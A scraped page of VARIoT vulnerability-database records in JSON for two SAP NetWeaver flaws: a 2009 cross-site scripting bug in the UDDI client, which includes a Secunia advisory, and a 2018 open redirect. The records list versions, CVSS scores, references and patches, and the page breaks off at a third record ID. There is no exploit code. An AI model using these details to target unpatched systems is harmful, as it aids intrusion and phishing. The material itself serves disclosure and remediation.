Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200908-0363",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 2.4,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver application server",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "BID",
"id": "36034"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-006252"
},
{
"db": "NVD",
"id": "CVE-2009-2932"
},
{
"db": "CNNVD",
"id": "CNNVD-200908-337"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2009-2932"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Alexander Polyakov",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200908-337"
}
],
"trust": 0.6
},
"cve": "CVE-2009-2932",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2009-2932",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2009-2932",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200908-337",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-006252"
},
{
"db": "NVD",
"id": "CVE-2009-2932"
},
{
"db": "CNNVD",
"id": "CNNVD-200908-337"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting (XSS) vulnerability in uddiclient/process in the UDDI client in SAP NetWeaver Application Server (Java) 7.0 allows remote attackers to inject arbitrary web script or HTML via the TModel Key field. SAP NetWeaver Application Server is prone to an HTML-injection vulnerability because the application\u0027s UDDI client fails to properly sanitize user-supplied input before using it in dynamically generated content. \nAttacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. \nThis issue is documented by SAP Note 1322098. ----------------------------------------------------------------------\n\nDo you have VARM strategy implemented?\n\n(Vulnerability Assessment Remediation Management) \n\nIf not, then implement it through the most reliable vulnerability\nintelligence source on the market. \n\nImplement it through Secunia. \n\nFor more information visit:\nhttp://secunia.com/advisories/business_solutions/\n\nAlternatively request a call from a Secunia representative today to\ndiscuss how we can help you with our capabilities contact us at:\nsales@secunia.com\n\n----------------------------------------------------------------------\n\nTITLE:\nSAP NetWeaver Application Server UDDI Client Cross-Site Scripting\n\nSECUNIA ADVISORY ID:\nSA36228\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/36228/\n\nDESCRIPTION:\nA vulnerability has been reported in SAP NetWeaver, which can be\nexploited by malicious people to conduct cross-site scripting\nattacks. \n\nThe vulnerability is reported in SAP NetWeaver Application Server\nJava version 7.0. Other versions may also be affected. \n\nSOLUTION:\nApply vendor patch (please see SAP note 1322098). \nhttps://service.sap.com/sap/support/notes/1322098\n\nPROVIDED AND/OR DISCOVERED BY:\nAlexander Polyakov, Digital Security Research Group [DSecRG]\n\nORIGINAL ADVISORY:\nhttp://www.dsecrg.com/pages/vul/show.php?id=133\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2009-2932"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-006252"
},
{
"db": "BID",
"id": "36034"
},
{
"db": "PACKETSTORM",
"id": "80345"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2009-2932",
"trust": 2.4
},
{
"db": "BID",
"id": "36034",
"trust": 1.9
},
{
"db": "SECUNIA",
"id": "36228",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1022731",
"trust": 1.6
},
{
"db": "OSVDB",
"id": "57000",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2009-006252",
"trust": 0.8
},
{
"db": "XF",
"id": "52429",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20090812 [DSECRG-09-033] SAP NETWEAVER UDDI - XSS SECURITY VULNERABILITY",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200908-337",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "80345",
"trust": 0.1
}
],
"sources": [
{
"db": "BID",
"id": "36034"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-006252"
},
{
"db": "PACKETSTORM",
"id": "80345"
},
{
"db": "NVD",
"id": "CVE-2009-2932"
},
{
"db": "CNNVD",
"id": "CNNVD-200908-337"
}
]
},
"id": "VAR-200908-0363",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:44:54.185000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "NetWeaver",
"trust": 0.8,
"url": "http://scn.sap.com/community/netweaver"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-006252"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-006252"
},
{
"db": "NVD",
"id": "CVE-2009-2932"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://www.dsecrg.com/pages/vul/show.php?id=133"
},
{
"trust": 1.7,
"url": "https://service.sap.com/sap/support/notes/1322098"
},
{
"trust": 1.6,
"url": "http://osvdb.org/57000"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/36228"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/36034"
},
{
"trust": 1.6,
"url": "http://www.securitytracker.com/id?1022731"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/archive/1/505697/100/0/threaded"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/52429"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2932"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2009-2932"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/52429"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/505697/100/0/threaded"
},
{
"trust": 0.3,
"url": "/archive/1/505697"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/business_solutions/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/36228/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
}
],
"sources": [
{
"db": "BID",
"id": "36034"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-006252"
},
{
"db": "PACKETSTORM",
"id": "80345"
},
{
"db": "NVD",
"id": "CVE-2009-2932"
},
{
"db": "CNNVD",
"id": "CNNVD-200908-337"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "36034"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-006252"
},
{
"db": "PACKETSTORM",
"id": "80345"
},
{
"db": "NVD",
"id": "CVE-2009-2932"
},
{
"db": "CNNVD",
"id": "CNNVD-200908-337"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2009-08-12T00:00:00",
"db": "BID",
"id": "36034"
},
{
"date": "2012-12-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2009-006252"
},
{
"date": "2009-08-15T10:26:49",
"db": "PACKETSTORM",
"id": "80345"
},
{
"date": "2009-08-21T20:30:00.407000",
"db": "NVD",
"id": "CVE-2009-2932"
},
{
"date": "2009-08-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200908-337"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2009-08-21T15:55:00",
"db": "BID",
"id": "36034"
},
{
"date": "2012-12-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2009-006252"
},
{
"date": "2018-10-10T19:42:45.500000",
"db": "NVD",
"id": "CVE-2009-2932"
},
{
"date": "2009-08-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200908-337"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200908-337"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Application Server of UDDI Client cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-006252"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "80345"
},
{
"db": "CNNVD",
"id": "CNNVD-200908-337"
}
],
"trust": 0.7
}
}
var-201811-0444
Vulnerability from variot
Due to insufficient URL Validation in forums in SAP NetWeaver versions 7.30, 7.31, 7.40, an attacker can redirect users to a malicious site. SAP NetWeaver Contains an open redirect vulnerability.Information may be obtained and information may be altered. SAP NetWeaver is prone to open-redirection vulnerability An attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201811-0444",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 2.7,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 2.7,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 2.7,
"vendor": "sap",
"version": "7.30"
}
],
"sources": [
{
"db": "BID",
"id": "105898"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011846"
},
{
"db": "NVD",
"id": "CVE-2018-2476"
},
{
"db": "CNNVD",
"id": "CNNVD-201811-398"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2476"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "105898"
}
],
"trust": 0.3
},
"cve": "CVE-2018-2476",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-2476",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2018-2476",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-2476",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201811-398",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-011846"
},
{
"db": "NVD",
"id": "CVE-2018-2476"
},
{
"db": "CNNVD",
"id": "CNNVD-201811-398"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Due to insufficient URL Validation in forums in SAP NetWeaver versions 7.30, 7.31, 7.40, an attacker can redirect users to a malicious site. SAP NetWeaver Contains an open redirect vulnerability.Information may be obtained and information may be altered. SAP NetWeaver is prone to open-redirection vulnerability\nAn attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2476"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011846"
},
{
"db": "BID",
"id": "105898"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-2476",
"trust": 2.7
},
{
"db": "BID",
"id": "105898",
"trust": 1.9
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011846",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201811-398",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "105898"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011846"
},
{
"db": "NVD",
"id": "CVE-2018-2476"
},
{
"db": "CNNVD",
"id": "CNNVD-201811-398"
}
]
},
"id": "VAR-201811-0444",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:02:24.913000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Patch Day - November 2018",
"trust": 0.8,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=503809832"
},
{
"title": "SAP NetWeaver Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=86808"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-011846"
},
{
"db": "CNNVD",
"id": "CNNVD-201811-398"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-601",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-011846"
},
{
"db": "NVD",
"id": "CVE-2018-2476"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "https://launchpad.support.sap.com/#/notes/2658755"
},
{
"trust": 1.9,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=503809832"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/105898"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-2476"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-2476"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
}
],
"sources": [
{
"db": "BID",
"id": "105898"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011846"
},
{
"db": "NVD",
"id": "CVE-2018-2476"
},
{
"db": "CNNVD",
"id": "CNNVD-201811-398"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "105898"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011846"
},
{
"db": "NVD",
"id": "CVE-2018-2476"
},
{
"db": "CNNVD",
"id": "CNNVD-201811-398"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-11-13T00:00:00",
"db": "BID",
"id": "105898"
},
{
"date": "2019-01-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-011846"
},
{
"date": "2018-11-13T20:29:00.357000",
"db": "NVD",
"id": "CVE-2018-2476"
},
{
"date": "2018-11-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201811-398"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-11-13T00:00:00",
"db": "BID",
"id": "105898"
},
{
"date": "2019-01-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-011846"
},
{
"date": "2018-12-13T16:51:53.497000",
"db": "NVD",
"id": "CVE-2018-2476"
},
{
"date": "2018-11-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201811-398"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201811-398"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Open redirect vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-011846"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201811-398"
}
],
"trust": 0.6
}
}
var-201402-0240
Vulnerability from variot
